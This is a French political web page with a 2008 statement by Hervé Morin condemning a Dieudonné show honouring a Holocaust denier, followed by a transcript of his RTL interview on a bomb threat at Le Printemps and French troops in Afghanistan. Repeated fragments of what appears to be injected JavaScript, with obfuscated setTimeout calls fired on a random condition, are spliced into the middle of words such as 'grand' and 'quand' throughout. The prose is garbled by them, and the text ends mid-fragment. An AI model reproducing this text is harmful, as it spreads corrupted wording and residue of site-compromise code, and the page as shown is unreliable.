29.12.2008 : Dieudonné, une mise en scène lugubre

Dieudonné est devenu l’artisan d’un moment sinistre, celui d’une foule ovationnant le principal théoricien du négationnisme dans une mise en scène lugubre, associant un comédien déguisé en déporté. Un tel acte ne peut inspirer que le dégoût et le mépris. Il frappe par son caractère irresponsable et abject. En insultant la mémoire des victimes de la barbarie nazie, Dieudonné achève de se discréditer lui-même. Aucune conviction ne peut justifier une telle manipulation du malheur des Hommes.

Alors même que Dieudonné se présente comme le grandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and défenseur de la liberté d’expression, son expression qui se veut humoristique se limite à des coups médiatiques qui n’ont qu’un seul objectif, le projeter sur le devant de la scène.

Hervé MORIN
Président du Nouveau Centre

17.12.2008 : L’invité de Jean-Michel Apathie (RTL)

Script de l’interview

VINCENT PARIZOT
Et à 7H50 sur RTL, Jean-Michel APHATIE, vous recevez donc le ministre de la Défense.

JEAN-MICHEL APHATIE
Bonjour Hervé MORIN, des explosifs ont été découverts hier au magasin parisien Le PRINTEMPS, c’est un Front révolutionnaire afghan qui a revendiqué cette action – aucun spécialiste ne connaît ce Front révolutionnaire afghan et du coup les enquêteurs, Jean-Richard ALPHONSE le disait dans le journal de 7 heures, ont tendance à ne pas juger très sérieuse la piste islamique, quelle est votre opinion Hervé MORIN ?

HERVE MORIN
Eh bien c’est évident, comme le disait d’ailleurs Alain DUHAMEL à l’instant, la phraséologie, la dialectique n’est pas la dialectique des mouvements terroristes islamiques. Le mot révolutionnaire figurant dans le nom du groupe, le mot capitaliste pour désigner des magasins, l’absence de référence à l’Islam au Djihad font qu’en effet la piste islamique en tant que telle n’est pas la piste première. Mais il ne faut absolument rien négliger par nature et il nous faut être vigilants, déterminés, prudents, mais aussi parfaitement, avoir la fermeté nécessaire, voilà. Prudence et fermeté, vigilance et détermination, ce sont ça les mots.

JEAN-MICHEL APHATIE
Un lien est fait dans la revendication entre cet acte, donc le dépôt d’explosif dans ce magasin et la présence des troupes françaises en Afghanistan, 2 800 français, militaires français sont aujourd’hui engagés en Afghanistan. Cet engagement en Afghanistan nous met en danger, Hervé MORIN, est-ce que cette circonstance, ce qui se passe vous conduit à réfléchir et à revisiter les raisons de cet engagement ?

HERVE MORIN
Vous savez Jean-Michel APHATIE, la menace terroriste c’est la grandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ande menace pour l’ensemble de la planète, cela ne se limite pas à la France, cela ne se limite pas aux grandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andes puissances occidentales – cette menace là, elle frappe partout. Elle frappe en Algérie, à Alger, elle frappe à Casablanca, elle frappe à Bali et cette menace là peut concerner à la fois des grandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andes puissances ayant un jeu et un rôle sur la scène internationale, comme des pays qui n’ont pas, en tant que tels un rôle majeur. Je vais vous raconter cette anecdote, je ne vous citerai pas le pays. Un de mes collègues, ministre de la Défense d’un petit pays d’Asie m’indiquait qu’il y a quelque temps, on avait déjoué des plans terroristes et un réseau terroriste qui avait en perspective de poser des bombes dans leur métro. Et dieu sait que ce pays n’est pas un pays majeur ou jouant un rôle en Afghanistan.

JEAN-MICHEL APHATIE
Là vous parlez du terrorisme sur les territoires, mais savez vous pourquoi, aujourd’hui, comment l’expliquez-vous, savez vous pourquoi nous sommes engagés aujourd’hui, militairement en Afghanistan, l’action dure depuis 8 ans et elle a l’air interminable, ne pas avoir de fin.

HERVE MORIN
Nous y sommes depuis 2001, par une décision conjointe à l’époque du président de la République qui s’appelait Jacques CHIRAC et du Premier ministre qui s’appelait Lionel JOSPIN. Nous y somme avec 25 pays, membres de l’Union européenne, tous y sont. Nous y sommes en vertu de résolution des Nations Unies, votée chaque année à l’unanimité, Chine et Russie compris. Nous y sommes non pas pour faire la guerre à l’Afghanistan, nous y sommes pour reconstruire la paix et la stabilité d’un pays qui était, la base arrière du terrorisme international.

JEAN-MICHEL APHATIE
Et jusqu’à quandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and y serons-nous Hervé MORIN ?

HERVE MORIN
Et nous y sommes pour à la fois assurer la stabilité et pour donner à l’Afghanistan les moyens d’assurer sa souveraineté. C’est-à-dire que nous sommes en train de construire une armée et elle prend figure. Je vous invite Jean-Michel APHATIE en Afghanistan, j’y vais le 31 décembre voir les troupes et fêter le 31 décembre avec elles, je vous y invite. Vous verrez à quel point l’armée afghane est en train de prendre corps. La police afghane en même temps…

JEAN-MICHEL APHATIE
Les indications semblent indiquer que la situation se dégrade sur le terrain. Je cite juste un extrait du Conseil international sur la sécurité, le Développement, qui est une organisation que vous devez connaître et qui, début décembre écrit ceci dans un rapport. Les Talibans, donc les ennemis des troupes de l’OTAN sont aux portes de la capitale, ils s’infiltrent dans la ville à leur guise, sur les quatre accès menant à Kaboul, trois sont compromis par l’activité des Talibans.

HERVE MORIN
A la fois, vous avez ces éléments là,

JEAN-MICHEL APHATIE
Que vous ne contestez pas.

HERVE MORIN
Non, il est évident que la situation est plus dégradée qu’elle ne l’était il y a deux ou trois ans, qui serait le nier ? Mais en même temps on a construit 4.000 kilomètres de routes, on a scolarisé 6 millions d’enfants. On a fait en sorte qu’aujourd’hui, 80 % des afghans ont accès à la santé, alors que moins de 10 à 15 % n’y avaient accès en 2001, quandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}